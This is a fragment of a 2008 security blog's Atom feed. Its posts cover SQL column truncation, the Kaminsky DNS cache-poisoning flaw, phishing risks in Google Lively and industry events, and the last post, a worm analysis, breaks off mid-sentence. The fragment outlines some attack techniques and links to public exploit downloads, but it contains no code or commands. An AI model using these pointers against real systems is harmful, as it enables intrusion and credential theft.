href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=8057332902597113735' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8057332902597113735'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8057332902597113735'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/09/zombie-networks-go-bos.html' title='Zombie networks go bos'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_XOVFBhYwjwI/SMqKLtyav5I/AAAAAAAAAAo/0zWjAHLAkwM/s72-c/telspace_oct.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-3964336916685117683</id><published>2008-09-08T10:25:00.002+02:00</published><updated>2008-09-08T10:32:30.893+02:00</updated><title type='text'>MySQL and SQL Column Truncation Vulnerabilities</title><content type='html'>I've found a really interesting &lt;a href="http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/"&gt;blog post&lt;/a&gt; this morning by Stefan Esser discussing a problem he calls 'MySQL and SQL Column Truncation Vulnerabilities'. This vulnerability takes advantage of the max_packet_size configuration by placing a large number of spaces and then a random character after the spaces. This basically allows an attacker to add "duplicate" entries to your database.&lt;br /&gt;&lt;br /&gt;As you can image this would bring around pretty big issues with services like user registration. You can read his excellent post for a good breakdown of this vulnerability &lt;a href="http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This morning the &lt;a href="http://www.milw0rm.com/exploits/6397"&gt;first exploit&lt;/a&gt; for this kind of vulnerability in a web application was also released. This affects the latest version of &lt;a href="http://wordpress.org/"&gt;Wordpress.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-3964336916685117683?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/3964336916685117683/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=3964336916685117683' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3964336916685117683'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3964336916685117683'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/09/mysql-and-sql-column-truncation.html' title='MySQL and SQL Column Truncation Vulnerabilities'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-9119002540858513757</id><published>2008-09-04T15:36:00.004+02:00</published><updated>2008-09-04T15:43:09.725+02:00</updated><title type='text'>ISGA meeting in Bryanston</title><content type='html'>The turn-out of today’s Information Security Group of Africa (ISGA) meeting at the Cisco Offices in Bryanston was really impressive.&lt;br /&gt;&lt;br /&gt;Numerous information security role-players from many different companies (including Discovery, BCX, RSA, Deloitte, and Investec) convened to hear what their peers had to say about the industry.&lt;br /&gt;&lt;br /&gt;On the ISGA front, Karel Rode, acting chairman, showed the crowd a slide of the ISGA website’s new look. “We will be displaying security-related live content from various sources onto the homepage,” he said.&lt;br /&gt;&lt;br /&gt;The first talker of the day was Dion Fowles from Alexander Forbes who spoke extensively about the new Protection of Personal Information (PPI) Bill and what its impact will be on the corporate environment. He outlined and discussed the Bill’s eight principles, specifically Principle 6 (security safeguards) which is the only principle that deals with IT-related issues.&lt;br /&gt;&lt;br /&gt;He took a layman’s approach to explaining the Bill and used his psychology background to make the presentation not only enjoyable, but understandable. All in all, a great presentation.&lt;br /&gt;&lt;br /&gt;Mike Silber from Michalson’s Attorneys focused his speech around more ‘fast-tracked’ Bills. He believes that the PPI bill will be put on hold until the next elections.&lt;br /&gt;&lt;br /&gt;He attempted to demystify the Companies Bill, the Competition Amendment Bill and the Consumer Protection Bill, which he sees as the mother of all Bills – complicated at best.&lt;br /&gt;&lt;br /&gt;It was clear from both Fowles’ and Silber’s presentations, however, that it is a very lucrative time to be in the information security service busines. Once more of these Bills are passed, network breaches and compromised client data will have to be publicly disclosed and even announced through the media.&lt;br /&gt;&lt;br /&gt;After the initial break, Jacques van Heerden from GTSP spoke to the audience about virtualisation. He mostly spoke about virtualisation in general – its definition, what a hypervisor is, where to start, pros and cons, although he did touch briefly upon how to handle your security if you plan on rolling out virtualisation.&lt;br /&gt;&lt;br /&gt;He mentioned VMWare quite frequently during his talk, particularly pointing out how good their products are. What he did fail to mention, however, was a recent security vulnerability that was reported on &lt;a href="http://www.milw0rm.org/exploits/6345"&gt;milw0rm&lt;/a&gt; that exploits an ActiveX method in VMWare.&lt;br /&gt;&lt;br /&gt;Finally, Peet Smith from Aptronics discussed security governance in IT. He believes that IT governance is currently maturing as there is a high awareness among corporates. Some of the keys drivers of this include legislation as well as customer requirements.&lt;br /&gt;&lt;br /&gt;Well done and thank you to Karel and the Cisco guys for a great opportunity to network and learn. Looking forward to the next one!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-9119002540858513757?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/9119002540858513757/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=9119002540858513757' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/9119002540858513757'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/9119002540858513757'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/09/isga-meeting-in-bryanston.html' title='ISGA meeting in Bryanston'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5741734642288977892</id><published>2008-08-14T11:48:00.010+02:00</published><updated>2008-08-14T12:05:24.125+02:00</updated><title type='text'>DNS still exploitable</title><content type='html'>&lt;span style="color: rgb(204, 204, 204);"&gt;Well for those of you who don't know it is still possible to poison the latest BIND patch with fully randomized ports. All that's required according to A Russian physicist, is a fast enough line, 2 computers and 10 hours of your time. He said "Attack took about half of the day, i.e. a bit less than 10 hours. So, if you have a GigE lan, any trojaned machine can poison your DNS during one night...". He released a post on his &lt;/span&gt;&lt;a style="color: rgb(102, 51, 102);" href="http://tservice.net.ru/%7Es0mbre/"&gt;blog&lt;/a&gt;&lt;span style="color: rgb(204, 204, 204);"&gt; showing how he did it. The exploit is now also available from his blog and other websites distributing exploits: http://tservice.net.ru/~s0mbre/archive/dns/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 204, 204);"&gt;When commenting on a &lt;/span&gt;&lt;a style="color: rgb(102, 51, 102);" href="http://www.nytimes.com/2008/08/09/technology/09flaw.html?_r=1&amp;amp;adxnnl=1&amp;amp;oref=slogin&amp;amp;adxnnlx=1218704558-op2dhZeKWHYuAbbcl1O+2w"&gt;New York Times article&lt;/a&gt;&lt;span style="color: rgb(204, 204, 204);"&gt; that discusses his findings, he said "Article says, that DJBDNS does not suffer from this attack. It does. Everyone does. With some tweaks it can take longer than BIND, but overall problem is there."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 204, 204);"&gt;In other news Telspace systems will be presenting and providing wireless and Bluetooth training this year at the exceptional and must attend event &lt;/span&gt;&lt;a style="color: rgb(102, 51, 102);" href="http://www.sector.ca/"&gt;Sector&lt;/a&gt;&lt;span style="color: rgb(204, 204, 204);"&gt; in Toronto, Canada.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="color: rgb(204, 204, 204);" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.sector.ca/"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_VRGFvOQtWJ4/SKP_9vbm8yI/AAAAAAAAAAc/t9kWjoloUfg/s320/sector.png" alt="" id="BLOGGER_PHOTO_ID_5234308628104016674" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5741734642288977892?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5741734642288977892/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5741734642288977892' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5741734642288977892'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5741734642288977892'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/08/dns-still-exploitable.html' title='DNS still exploitable'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VRGFvOQtWJ4/SKP_9vbm8yI/AAAAAAAAAAc/t9kWjoloUfg/s72-c/sector.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6025145142184378061</id><published>2008-08-08T13:40:00.001+02:00</published><updated>2008-08-08T13:44:21.062+02:00</updated><title type='text'>Phishers target Google Lively</title><content type='html'>Google's new social networking platform is under attack.&lt;br /&gt;&lt;br /&gt;Google recently deployed its own social networking platform, called Google Lively, which has come under the phisher's radar.&lt;br /&gt;&lt;br /&gt;Google Lively, currently in Beta stage, is similar to another application called Second Life, by Linden Labs. Lively is even being referred to as the “Second Life killer”.&lt;br /&gt;&lt;br /&gt;Google Lively users can embed the application into their Web sites using Google widgets, just as YouTube videos can be embedded into a blog, MySpace or Facebook account. From there they can create their own “room” for site visitors to chat/socialise in. Google Lively allows for customisable characters and personal rooms.&lt;br /&gt;&lt;br /&gt;The problem comes in when users have to authenticate themselves to the application, you can literally log in to Google Lively from a completely anonymous site hosting the content.&lt;br /&gt;&lt;br /&gt;As you can imagine, this brings about serious issues; an attacker could easily imitate a login screen for Google Lively and embed an object that just stores the username and password.&lt;br /&gt;&lt;br /&gt;Similar to a phishing attack, the user will be tricked into giving over their confidential information. It seems possible that the application may intercept the information and then forward the login details to the legitimate application, so from here the user wouldn't even know their account details have been stolen. The end-user would be clueless to what has just taken place.&lt;br /&gt;&lt;br /&gt;The application download is a mere 469Kb file. From there the application will initialise and install.&lt;br /&gt;&lt;br /&gt;Due to the fact that there was much hype about hacking Second Life, such as Michael Thumann's excellent talk on hacking Second Life, this definitely makes us think we will see a lot of interest in 'hacking' Google Lively.&lt;br /&gt;&lt;br /&gt;Not to mention the amount of information that can be acquired through utilising the application for, let's say, ‘interesting' purposes.&lt;br /&gt;&lt;br /&gt;It is highly recommended that a separate Google account be used for Google Lively activity. This would minimise risk, simply because if a password is stolen, the potential damage will be minimal to the end-user.&lt;br /&gt;&lt;br /&gt;In addition to using a separate account, it advised that South African users watch out for illegitimate Web sites, e-mails and links specifically pertaining to Google Lively.&lt;br /&gt;&lt;br /&gt;An attacker could easily imitate a login screen for Google Lively and embed an object that just stores the username and password.&lt;br /&gt;Google is concerned about security and has obviously drafted up several Web sites providing users with information on several attacks.&lt;br /&gt;&lt;br /&gt;They have said the following in response to the security speculation: “Sadly, phishing schemes and other malicious attempts to steal identities are rampant on the Web today. Lively is always working to improve site security and warns users of phishing attempts, but we feel that the Google Accounts system is safe and secure. Always be cautious when entering any username and password that you may have - being aware is your best protection!”&lt;br /&gt;&lt;br /&gt;Google has also provided a few safety tips on how not to fall victim to these attacks. These include advising users to be on the lookout for “phishy” e-mails, which contain generic greetings like "Attention Lively Member" or "Dear lucky user", targeted specifically for room owners (ie, "We're conducting a survey of Lively room creators...").&lt;br /&gt;&lt;br /&gt;These may contain links to Web sites that look exactly like lively sign-in pages. They have also described several techniques and methodologies to subscribers that hackers would utilise, such as forged “From” headers in the e-mail.&lt;br /&gt;&lt;br /&gt;Judging by the amount of people that still fall victim to phishing attacks, more needs to be done than telling users to check for forged headers. More can be read from here: &lt;a href="http://www.lively.com/help/bin/answer.py?answer=98980&amp;topic=15053"&gt;http://www.lively.com/help/bin/answer.py?answer=98980&amp;topic=15053&lt;/a&gt; .&lt;br /&gt;&lt;br /&gt;With more local users utilising Google services, it is more than just the fact that you can login to Google Lively from any anonymous Web site. There are several very important aspects to be concerned about in terms of the potential damage that could be caused. This definitely leaves a great amount of worries and concerns for the end-user. We can definitely expect to see some sort of attack against Google Lively in the not too distant future.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6025145142184378061?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6025145142184378061/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6025145142184378061' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6025145142184378061'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6025145142184378061'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/08/phishers-target-google-lively.html' title='Phishers target Google Lively'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6697163937595498884</id><published>2008-08-07T13:30:00.006+02:00</published><updated>2008-08-07T13:46:00.515+02:00</updated><title type='text'>Dan Kaminsky's Blackhat presentation packs room</title><content type='html'>&lt;p style="margin-bottom: 0cm; color: rgb(204, 204, 204);"&gt;&lt;span style="color: rgb(204, 204, 204);"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style=""&gt;&lt;a href="http://www.blackhat.com/"&gt;Black Hat&lt;/a&gt; had its hands full when Dan Kaminsky took the stage this year in Las Vegas. Dan's &lt;a href="http://www.doxpara.com/DMK_BO2K8.ppt"&gt;talk&lt;/a&gt; pulled around 1000 Black Hat attendees. Despite the fact that information about the vulnerability was released before hand. With the room overflowing and people even sitting on the floor to catch Dan's talk about the much &lt;a href="http://www.securityfocus.com/news/11526"&gt;publicised&lt;/a&gt; DNS flaws that could change the internet.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="background: transparent none repeat scroll 0% 50%; margin-bottom: 0cm; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; font-style: normal; text-decoration: none; color: rgb(204, 204, 204);"&gt; &lt;span style="color: rgb(204, 204, 204);"&gt;&lt;span style="font-size:100%;"&gt;Surprisingly Dan's DNS findings won him a &lt;a href="http://pwnie-awards.org/"&gt;Pwnie&lt;/a&gt; award for most over hyped bug. In Dan's talk he spoke about his findings and the potential threats that could have come about. Dan has also uploaded a &lt;a href="http://www.doxpara.com/?p=1204"&gt;summary&lt;/a&gt; of his talk to his site. And we even have a cool time line video:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="background: transparent none repeat scroll 0% 50%; margin-bottom: 0cm; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; font-style: normal; text-decoration: none; color: rgb(255, 255, 255);"&gt;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Ff5WBDOwueI&amp;amp;hl=en&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;embed src="http://www.youtube.com/v/Ff5WBDOwueI&amp;amp;hl=en&amp;amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" height="344" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="background: transparent none repeat scroll 0% 50%; margin-bottom: 0cm; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; font-style: normal; text-decoration: none; color: rgb(255, 255, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6697163937595498884?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6697163937595498884/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6697163937595498884' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6697163937595498884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6697163937595498884'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/08/black-hat-had-its-hands-full-when-dan.html' title='Dan Kaminsky&apos;s Blackhat presentation packs room'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-953109829918433379</id><published>2008-07-23T16:42:00.004+02:00</published><updated>2008-07-23T16:56:22.970+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dns'/><category scheme='http://www.blogger.com/atom/ns#' term='dan kaminsky'/><title type='text'>DNS vulnerability uncovered?</title><content type='html'>It appears someone has rediscovered Dan Kaminsky's DNS vulnerability. Security researcher Halvar Flake, has posted a &lt;a href="http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html"&gt;hypotheses&lt;/a&gt; of his findings on his blog. While this hasn't been confirmed to be the same issue, &lt;a href="http://rdist.root.org/2008/07/21/dns-novice-discovers-secret-flaw/"&gt;security researchers&lt;/a&gt; are saying it is indeed. we sure hope it is. Dan declined to confirm if it is the same vulnerability.&lt;br /&gt;&lt;br /&gt;Matasano, one of the companies briefed about Dan's findings have leaked some information on their site, it was soon &lt;a href="http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/"&gt;removed&lt;/a&gt; but is now &lt;a href="http://beezari.livejournal.com/141796.html"&gt;mirrored on other sites&lt;/a&gt; for our reading pleasure. And according to Dave Aitel, chief technology officer at security vendor Immunity, hackers are almost certainly already developing attack code for the bug, and will most likely appear within the next few days.&lt;br /&gt;&lt;br /&gt;Did anyone really expect this to be kept under wraps until Blackhat next month?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-953109829918433379?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/953109829918433379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=953109829918433379' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/953109829918433379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/953109829918433379'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/07/dns-vulnerability-uncovered.html' title='DNS vulnerability uncovered?'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-2920243932309493984</id><published>2008-07-17T14:09:00.001+02:00</published><updated>2008-07-17T14:11:03.143+02:00</updated><title type='text'>DNS Goes Bad</title><content type='html'>There has been an enormous amount of concern on the Internet after the recent announcement that a severe issue has been discovered affecting almost all DNS servers.&lt;br /&gt;&lt;br /&gt;The researcher and security guru credited for finding the vulnerability is Dan Kaminsky. He found the issue around six months ago, by complete accident.&lt;br /&gt;&lt;br /&gt;We can all be grateful that Kaminsky responsibly disclosed this specific issue, as this vulnerability could have had severe consequences and ultimately he would have been able to obtain a hefty amount of money from the right (and wrong) people. In his words: "DNS goes bad, every Web site goes bad, and every e-mail goes... somewhere."&lt;br /&gt;&lt;br /&gt;This specific finding has rocked the Internet and security world as we know it and although Kaminsky says nothing of this scale has happened before, he assures us that everything is genuinely under control.&lt;br /&gt;&lt;br /&gt;Giants in the IT industry came together in March 2008 at Microsoft's campus in Redmond, Washington, where they engaged in secretive research to address the issue and come up with patches that could be released simultaneously by multiple vendors.&lt;br /&gt;&lt;br /&gt;The meetings included Microsoft, Cisco, Sun and as well as the Internet Systems Consortium (ISC), creator of BIND (the most commonly used DNS server on the Internet) among others, and 16 researchers including Kaminsky.&lt;br /&gt;&lt;br /&gt;"This hasn't been done before and it is a massive undertaking," said Kaminsky.&lt;br /&gt;&lt;br /&gt;Microsoft released a patch for this vulnerability on Tuesday, 8 July with its 'Black Tuesday' updates.&lt;br /&gt;&lt;br /&gt;What does DNS poisoning do?&lt;br /&gt;&lt;br /&gt;DNS translates domain names to IP addresses (those numbers you can never remember) and is at the core of many Internet services. For example, www.itweb.co.za translates to 196.30.226.221.&lt;br /&gt;&lt;br /&gt;This specific issue, which was discovered by Kaminsky, can allow attackers to poison DNS servers cache and essentially route Internet traffic in any way they want and effectively, impersonate any site they want.&lt;br /&gt;&lt;br /&gt;This allows for 'phishing' attacks to be far more damaging. This is because even if you have entered the address correctly into the browser, you may still end up at a fraudulent site. The list of possibilities goes on with many other protocols.&lt;br /&gt;&lt;br /&gt;This specific finding has rocked the Internet and security world as we know it and although Kaminsky says nothing of this scale has happened before, he assures us that everything is genuinely under control.&lt;br /&gt;As a short description, phishing attacks can often be described as when attackers set up fraudulent Web sites to impersonate an authentic Web site. This is done to trick the user into disclosing sensitive information such as credit card numbers or banking details. Needless to say, the consequences of this attack could be severe.&lt;br /&gt;&lt;br /&gt;We would definitely see a lot of pharming attacks. If this had to have been exploited in the wild, e-commerce and banking Web sites would have been greatest affected by the attacks.&lt;br /&gt;&lt;br /&gt;Pharming is when a specific Web site's traffic is redirected to a bogus Web site. Many users would fall victim to this attack and not even know it. End-users would not even be aware they have provided very useful information which is harvested by the attackers. Similar to the attack in January 2005, the domain name for a large New York ISP, Panix, which was hijacked to direct to a site in Australia.&lt;br /&gt;&lt;br /&gt;I recommend restricting access to the name server, filtering traffic, running local DNS cache, disabling recursion, and implementing source port randomisation.&lt;br /&gt;&lt;br /&gt;I hope that the public and everyone reading any advisories pertaining to this issue will test their DNS servers and ultimately apply the relevant patches as soon as possible.&lt;br /&gt;&lt;br /&gt;Most technical details of this vulnerability have been kept under wraps for now. This has been done to give administrators and users more time to patch their servers. Kaminsky will, however, disclose all information about the vulnerability at the BlackHat conference during August.&lt;br /&gt;&lt;br /&gt;While many servers will automatically apply the relevant patches for this issue, a large number of servers are still vulnerable.&lt;br /&gt;&lt;br /&gt;Those that are unsure if they are vulnerable to this issue can visit Kaminsky's Web site at http://www.doxpara.com/. From there, they will be able to see whether their name server is vulnerable. The relevant patches should be applied as soon as possible for servers that are vulnerable.&lt;br /&gt;&lt;br /&gt;Kaminsky has said: "People should be concerned but they should not be panicking." There is still time for servers to be patched.&lt;br /&gt;&lt;br /&gt;Kaminsky has also called on a number of security researchers to look for more issues, as he believes there still may be a number of undisclosed issues in DNS. He is also willing to let a finder of an issue come on stage with him at Defcon (2008 security conference), according to his blog.&lt;br /&gt;&lt;br /&gt;ISC has so far encouraged DNS administrators with servers behind port-restricted firewalls to review their firewall policies to allow this protocol-compliant behavior.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-2920243932309493984?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/2920243932309493984/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=2920243932309493984' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2920243932309493984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2920243932309493984'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/07/dns-goes-bad.html' title='DNS Goes Bad'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-8691529855003568923</id><published>2008-06-12T20:37:00.006+02:00</published><updated>2008-06-12T20:48:18.174+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Training'/><category scheme='http://www.blogger.com/atom/ns#' term='Celebrations'/><title type='text'>Zone-h Partnership</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_4Wfys5NtIhA/SFFuNTCTnXI/AAAAAAAAABg/BTV4bp8gMV4/s1600-h/telspace_sept.gif"&gt;&lt;img style="cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_4Wfys5NtIhA/SFFuNTCTnXI/AAAAAAAAABg/BTV4bp8gMV4/s320/telspace_sept.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5211067418571677042" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I am pleased to announce that Telspace Systems has &lt;span style="font-weight:bold;"&gt;officially&lt;/span&gt; signed a training partnership agreement with Zone-h. &lt;br /&gt;&lt;br /&gt;This opens new doors for Zone-h in the South African region, it also allows us to market their courses locally in South Africa as exclusive partners. &lt;br /&gt;&lt;br /&gt;We will be kicking off the first Zone-h training session on the 23rd and 24th of September 2008, with Hands-On-Hacking Unlimited. A full training schedule will be available on our website in the next week or so(you can always email us for a copy too). I strongly suggest you to attend the initial training session, as Roberto himself will be coming down to Johannesburg to present the course with us.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-8691529855003568923?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/8691529855003568923/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=8691529855003568923' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8691529855003568923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8691529855003568923'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/06/zone-h-partnership.html' title='Zone-h Partnership'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_4Wfys5NtIhA/SFFuNTCTnXI/AAAAAAAAABg/BTV4bp8gMV4/s72-c/telspace_sept.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-2001621739671272887</id><published>2008-06-03T23:01:00.008+02:00</published><updated>2008-06-04T09:43:46.146+02:00</updated><title type='text'>Silent Love China - Reference to sabc.co.za and reportstar.net hax</title><content type='html'>&lt;span style="" lang="EN-ZA"&gt;After a bit of excitement in the office about yesterday’s post, we decided to do a bit of analysis on the worm that hit the SABC and Reportstar (time constraints applicable).&lt;br /&gt;&lt;/span&gt;&lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;We obviously used our limited time trying to find out exactly what htm files, javascript, swf and exe’s we could get out, and what exactly they did.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;     &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;The files which we are currently storing 